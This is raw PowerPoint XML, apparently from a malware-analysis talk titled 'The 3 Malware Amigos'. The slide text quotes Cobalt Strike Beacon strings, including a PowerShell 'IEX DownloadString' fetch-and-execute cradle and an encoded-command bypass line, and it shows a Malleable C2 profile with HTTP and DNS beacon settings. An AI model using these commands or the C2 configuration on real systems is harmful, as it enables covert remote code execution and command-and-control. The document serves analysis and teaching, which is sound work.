            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('http://127.0.0.1:%u/')";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%%IMPORT%%";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Command length (%d) too long";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "IEX (New-Object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Net.Webclient</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DownloadString</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>('http://127.0.0.1:%u/'); %s";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powershell</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nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -exec bypass -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>EncodedCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> \"%s\"";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "?%s=%s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s&amp;%s=%s";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 %s";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s&amp;%s";</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s%s</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kill %d: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s	%d	%d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s	%d	%d	%s	%s	%d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s\\*";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "sha256";</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abcdefghijklmnop</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sprng</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string "could not create pipe: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "I'm already in SMB mode";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "%s (admin)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not open process: %d (%u)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Failed to impersonate token from %d (%u)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Failed to duplicate primary token for %d (%u)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Failed to impersonate logged on user %d (%u)";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Could not create token: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "HTTP/1.1 200 OK";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Content-Type: application/octet-stream";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Content-Length: %d";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	string "Microsoft Base Cryptographic Provider v1.0";</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 for an HTTP GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http-get {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	# Beacon will randomly choose from this pool of URIs</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uri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "/ca /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dpixel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /__utm.gif /pixel.gif /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>g.pixel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /dot.gif /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>updates.rss</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fwlink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /cm /cx /pixel /match /visit.js /load /push /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /j.ad /ga.js /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>en_US</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/all.js /activity /IE9CompatViewList.xml";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client {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		# base64 encode session metadata and store it in the Cookie header.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		metadata {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			base64;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			header "Cookie";</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server {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		# server should send output with no changes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		header "Content-Type" "application/octet-stream";</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 for an HTTP POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http-post {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	# Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided]</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uri</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submit.php</a:t>
            </a:r>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client {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		header "Content-Type" "application/octet-stream";</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transmit our session identifier as /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>submit.php?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=[identifier]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		id {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			parameter "id";</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post our output with no real changes</a:t>
            </a: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The server's response to our HTTP POST</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	server {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		header "Content-Type" "text/html";</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this will just print an empty string, meh...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		output {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>			print;</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define indicators/attributes for a DNS Beacon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-beacon {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    # maximum number of bytes to send in a DNS A record request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maxdns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    "255";</a:t>
            </a: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set beacon "";</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get_A</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cdn</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get_AAAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "www6.";</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get_TXT</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api</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put_metadata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "www.";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>put_output</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> "post.";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="9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34290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013" y="363538"/>
            <a:ext cx="6403975" cy="3602037"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="9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3892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12000">
              <a:schemeClr val="accent1">
                <a:lumMod val="39535"/>
                <a:lumOff val="60465"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="62000">
              <a:schemeClr val="accent1">
                <a:lumMod val="95000"/>
                <a:lumOff val="5000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent1">
                <a:lumMod val="6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9615" y="872844"/>
            <a:ext cx="11271739" cy="2422602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr sz="6000" cap="all"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150364" y="3820644"/>
            <a:ext cx="7891272" cy="774895"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="2200" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface=""/>
                <a:ea typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34"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16" name="TextBox 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FE617F3-9164-B146-B000-2E0FAEE100B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5564767" y="6339255"/>
            <a:ext cx="1883016" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>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The 3 Malware Amigos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Straight Connector 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3674D186-F13D-1B42-993C-2D1319A7F9A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3766038" y="3558046"/>
            <a:ext cx="4659923" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="539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17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5721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22284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811966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29709429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3651946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34987213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9"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Google Shape;22;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="181708" y="-1"/>
            <a:ext cx="9891200" cy="11064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3" name="Google Shape;23;p3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1249279"/>
            <a:ext cx="10515600" cy="49512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00478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Image | Content">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Text Placeholder 16"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5037364" y="426704"/>
            <a:ext cx="6776355" cy="5990425"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr sz="2400">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2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1"/>
                </a:solidFill>
                <a:latin typeface="Gotham Book" panose="02000604040000020004" pitchFamily="50" charset="0"/>
                <a:ea typeface="Gotham Book" panose="02000604040000020004" pitchFamily="50" charset="0"/>
                <a:cs typeface="Gotham Book" panose="02000604040000020004" pitchFamily="50" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="1427163" indent="0">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl8pPr>
